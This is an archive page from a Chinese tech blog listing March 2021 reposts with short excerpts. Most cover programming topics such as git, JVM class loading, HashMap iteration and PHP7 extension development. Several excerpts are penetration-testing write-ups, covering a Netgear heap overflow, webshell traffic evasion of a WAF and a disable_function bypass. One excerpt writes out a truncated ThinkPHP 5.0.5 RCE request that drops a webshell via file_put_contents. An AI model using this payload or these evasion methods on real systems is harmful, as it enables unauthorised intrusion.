2021年03月_zhangge3663

转载 git clone 获取指定分支的指定commit版本

第一步: git clone [git-url] -b [branch-name]第二步: git reset --hard [commit-number]

2021-03-30 20:34:31 21387

转载 class加载过程

1.class加载过程java虚拟机把描述类的数据从class文件加载到内存，并对数据进行校验/准备/解析和初始化，最终形成可以被虚拟机直接使用的Java类型，这个过程被称作虚拟机的类加载机制。称作虚拟机的类加载机制。loading -> linking (verification -> preparation -> resolution)-> resolution)->initializingloading: 把class文件load到内存中，采用双亲委派，

2021-03-30 20:33:07 737

转载 https://mp.weixin.qq.com/s/ilO6DZwRpWdrruKm4J8CMw

近日安全漏洞频发，小编在此收集了近期大家会比较关注的漏洞，做个总结，供大家查漏补缺，若有缺失，欢迎留言补充。目录一、OA系统二、E-mail三、Web中间件四、源代码管理五、项目管理系统六、开源运维监控七、堡垒机一、OA系统泛微(Weaver-Ecology-OA) 泛微OA E-cology（CNVD-2019-32204）远程命令执行漏洞 a漏洞分析漏洞出现在e-...

2021-03-29 15:44:45 30344

转载 HashMap的7种遍历方式

HashMap 遍历大体上可以分为4类:1,迭代器2，ForEach 遍历3，lambda 表达式遍历4，StreamsApi 遍历但是每种类型下有不同的实现方式，所以又可以分为7种：案例demo1，使用迭代器EntrySet的方式遍历@Test//1.使用迭代器EntrySet的方式遍历public void demo1() { //创建Map 对象 Map<Integer, String> map = new HashMap.

2021-03-29 15:38:10 464

转载 Netgear R6400v2 堆溢出漏洞分析与利用

2020 年 6 月，ZDI发布了一个关于Netgear R6700型号设备上堆溢出漏洞的安全公告，随后又发布了一篇关于该漏洞的博客，其中对该漏洞进行了详细分析，并给出了完整的漏洞利用代码。该漏洞存在于对应设备的httpd组件中，在处理配置文件上传请求时，由于对请求内容的处理不当，在后续申请内存空间时存在整数溢出问题，从而造成堆溢出问题。攻击者利用这一漏洞可以在目标设备上实现代码执行，且无需认证。此前，关于IoT设备上公开的带完整漏洞利用的堆溢出漏洞比较少(好像公开的堆溢出漏洞就不多...),正好手边有

2021-03-29 15:25:02 3107

转载如何使用Dirsearch探测Web目录

当渗透测试工程师执行网站渗透测试时，第一步应该是找到易受攻击的网站的隐藏目录。这些隐藏的Web目录非常重要，因为它们可以提供一些非常有用的信息，即在面向公众的网站上看不到的潜在攻击媒介。比较快捷的攻击方法之一就是采用暴力猜解网站目录及结构，其中包括网站中的目录、备份文件、编辑器、后台等敏感目录，为此，需要选择一个功能强大的工具。尽管有很多可用的工具来执行站点暴力破解，包括Dirbuster或Dirb，但是它们有其自身的局限性，例如Dirbuster仅提供时钟不可行的GUI界面，并且Dirb不包括

2021-03-29 14:51:08 1343

转载【php7扩展开发六】zval的操作

生成各类型zvalPHP7将变量的引用计数转移到了具体的value上，所以zval更多的是作为统一的传输格式，很多情况下只是临时性使用，比如函数调用时的传参，最终需要的数据是zval携带的zend_value，函数从zval取得zend_value后就不再关心zval了，这种就可以直接在栈上分配zval。分配完zval后需要将其设置为我们需要的类型以及设置其zend_value，PHP中定义的ZVAL_XXX()系列宏就是用来干这个的，这些宏第一个参数z均为要设置的zval的指针，后面为要设置的zend_

2021-03-24 13:24:23 416

转载【php7扩展开发五】函数调用

实际应用中，扩展可能需要调用用户自定义的函数或者其他扩展定义的内部函数,PHP提供的函数调用API的使用:ZEND_API int call_user_function(HashTable *function_table, zval *object,zval *function_name, zval *retval_ptr, uint32_t param_count, zval params[]);各参数的含义：__function_table:__ 函数符号表，普通函数是EG(funct

2021-03-24 13:21:33 215

转载【php7扩展开发四】函数的参数，引用传参，返回值

函数参数解析之前我们定义的函数没有接收任何参数，那么扩展定义的内部函数如何读取参数呢？用户自定义函数在编译时会为每个参数创建一个zend_arg_info结构，这个结构用来记录参数的名称、是否引用传参、是否为可变参数等，在存储上函数参数与局部变量相同，都分配在zend_execute_data上，且最先分配的就是函数参数，调用函数时首先会进行参数传递，按参数次序依次将参数的value从调用空间传递到被调函数的zend_execute_data，函数内部像访问普通局部变量一样通过存储位置访问参数，这是用户自

2021-03-24 13:18:32 352

转载【php7扩展开发三】ini配置

php.ini配置php.ini是PHP主要的配置文件，解析时PHP将在这些地方依次查找该文件：当前工作目录、环境变量PHPRC指定目录、编译时指定的路径，在命令行模式下，php.ini的查找路径可以用-c 参数替代。该文件的语法非常简单：配置标识符 = 值。空白字符和用分号';'开始的行被忽略，[xxx]行也被忽略；配置标识符大写敏感，通常会用'.'区分不同的节；值可以是数字、字符串、PHP常量、位运算表达式。关于php.ini的解析过程不作介绍，只从应用的角度介绍如何在一个扩展中获取一个配

2021-03-24 13:11:01 187

转载【php7扩展开发一】注册一个内部函数hello world

通过扩展可以将C语言实现的函数提供给PHP脚本使用，如同大量PHP内置函数一样，这些函数统称为内部函数(internal function),与PHP脚本中定义的用户函数不同，它们无需精力用户函数的编译过程，同时执行时也不像用户函数那样每一个指令都调用一次C语言编写的handler函数，因此，内部函数的执行效率更高。除了性能上的优势，内部函数还可以拥有更高的控制权限，可发挥的作用也更大，能够完成很多用户函数无法实现的功能。函数通过zend_function来表示，这是一个联合体，用户函数使用zend_f

2021-03-24 13:06:56 267

转载【php7扩展开发二】全局变量

使用C语言开发程序时经常会使用全局变量进行数据存储，这就涉及前面已经介绍过的一个问题：线程安全，PHP设计了TSRM(即:线程安全资源管理器)用于解决这个问题，内核中频繁使用到的EG、CG等都是根据是否开启ZTS封装的宏，同样的，在扩展中也需要必须按照TSRM的规范定义全局变量，除非你的扩展不支持多线程的环境。PHP为扩展的全局变量提供了一种存储方式：每个扩展将自己所有的全局变量统一定义在一个结构体中，然后将这个结构体注册到TSRM中，这样扩展就可以像使用EG、CG那样访问这个结构体。这个结构体的定

2021-03-23 16:55:23 185

转载【php内核与扩展开发系列】PHP生命周期---启动、终止与模式

启动与终止PHP程序的启动可以看做有两个概念上的启动，终止也有两个概念上的终止。其中一个是PHP作为Apache(拿它举例，板砖勿扔)的一个模块的启动与终止，这次启动PHP会初始化一些必要数据，比如与宿主Apache有关的，并且这些数据是常驻内存的，终止与之相对。还有一个概念上的启动就是当Apache分配一个页面请求过来的时候，PHP会有一次启动与终止，这也是我们最常讨论的一种。现在我们主要来看一个PHP扩展的生命旅程是怎样走完这四个过程的。在最初初始化的时候，就是PHP随着Apache的启动而

2021-03-23 10:10:04 181

转载 MySQL命令执行sql文件的两种方法

摘要：和其他数据库一样，MySQL也提供了命令执行sql脚本文件，方便地进行数据库、表以及数据等各种操作。下面笔者讲解MySQL执行sql文件命令的两种方法，希望能给刚开始学习MySQL数据库的朋友们。学习过SQLServer或Oracle的朋友会知道，sql 脚本是包含一到多个 sql 命令的 sql 语句集合，我们可以将这些 sql 脚本放在一个文本文件中（我们称之为“sql 脚本文件”），然后通过相关的命令执行这个 sql 脚本文件。基本步骤如下： 1、创建 sql 脚本文件，例如...

2021-03-16 13:11:15 3168

转载 apache日志 waf_WAF对WebShell流量检测的性能分析

最近在一次授权渗透测试中遇到了一个棘手的场景，万能的队友已经找到了后台上传点，并传了小马然后开心地用antsword进行连接，但是由于明文传输很快被waf感知，并引起了管理员的注意，很快我们的马被清了，真是偷鸡不成蚀把米。痛定思痛，我们判断对方并不能尽快修复漏洞，于是临阵抱佛脚，希望于通过加密算法提高攻击的质量。首先要做三件事第一，迅速在本地复现对方环境，第二，配置多种加密组合成攻击载荷，第三，用开源安全模块modsecurity测试攻击载荷加密后的效果。本地环境组建从保留的截图来看，对方的

2021-03-11 10:55:35 421

转载 JS破解专题|光汇云油登录算法

光汇云油加密JS分析我们在光汇云油的登录页发起登录，会发现POST请求包中有一个加密的params参数，全局搜索之后数量太多了，所以改用XHR断点了。当然，Initiator里边的调用栈也是可以的，比如其中的doSubmit，两种办法定位过去都行。发现postRequest此时包含着链接"/api/member/account/signin",这个时候里边还没有params，所以下断点跟进。点跟进之后浏览一下代码，发现疑似params生成函数:这里的n如下，passwor

2021-03-10 13:45:09 165

转载对某钓鱼网站的一次渗透测试

周末在某个CTF群偶然看到这个钓鱼网站:http://gggggg.cn(声明：本文中出现的域名、IP均被替换，并非真实存在，请勿测试),于是开始对该网站进行渗透。观察网站页面，可知这个网站应该是用来盗取QQ账号的。除了域名没有一点迷惑性，网站页面做的还行。如果用户不注意，点击了立即申请取消，就会弹出一个登陆框。一旦用户输入QQ账号密码，后台就会立刻记录到数据库中。先用dirsearch扫一下目录文件，并查看是否有可利用的功能点。同时通过页面源码、网站提供的功能，找到如下几个接口.

2021-03-10 13:26:27 1056 2

转载干货|对某杀猪盘的渗透测试

最近偶然发现一个虚拟货币买涨跌的杀猪盘，遂进行了一波测试，前台长这样。为thinkphp5.0.5随用RCE进行打入，成功写入webshell。s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MMTI8P3BocCBldmF

2021-03-10 12:00:38 1044 4

转载实战绕过宝塔PHP disable_function 限制getshell

一、这次做的目标站点是一个某XX站点，通过前期的信息收集，可以发现该站点是由宝塔(一般根服务器开放端口888、8888和报错界面判定)+ShuipfCMS框架搭建的端口信息后台二、默认的ShuipfCMS系统后台访问http://www.xxx.com/admin/会自动跳转到后台，但是这个站点感觉是被二次开发过的，站点后台和前端页面不在同一个子域名下，该后台还是通过收集子域名得到的，访问某xxx.xxx.com会自动跳转到后台登录页面。三、这里想着尝试绕过验证码来对后台用户名密码进

2021-03-09 17:45:02 3810

原创 f450四轴使用技巧

1.感度旋钮设为11点钟方向2.右摇杆的微调按钮为11点钟方向3.油门的拨杆没移动一格，然后用微调进行移动，如果微调的最大和最小不能达到效果，则将微调置为中点，再移动一格油门的拨杆，接着用微调来操作，以此循环.4.跟开手动档汽车一样，首先先熟悉每一个操作的效果，然后不断尝试不同的动作，熟能生巧。5.由于旋翼向下产生的升力跟很多因素有关，比如：电池的安装位置，电机的差异，地面的平整度等等，所以，为了推油门后就能平稳起飞，需要多调几次微调按钮.6.要降落的时候，每次等到飞行器下降到最低点的时候给一下油

2021-03-09 17:14:42 626

zhangge3663的博客